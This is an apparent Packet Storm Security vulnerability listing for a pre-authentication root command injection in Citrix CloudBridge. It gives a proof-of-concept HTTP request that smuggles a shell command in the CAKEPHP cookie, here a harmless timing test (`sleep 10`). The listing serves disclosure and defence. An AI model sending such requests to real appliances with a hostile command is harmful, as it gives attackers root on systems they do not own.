Citrix CloudBridge CAKEPHP Cookie Command Injection

Citrix CloudBridge suffers from a CAKEPHP pre-authentication remote root cookie command injection vulnerability.


MD5 | c2ccb69375ec5cc51c43f5d8342cbe14

Download
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout

Source: packetstormsecurity.com
Related Posts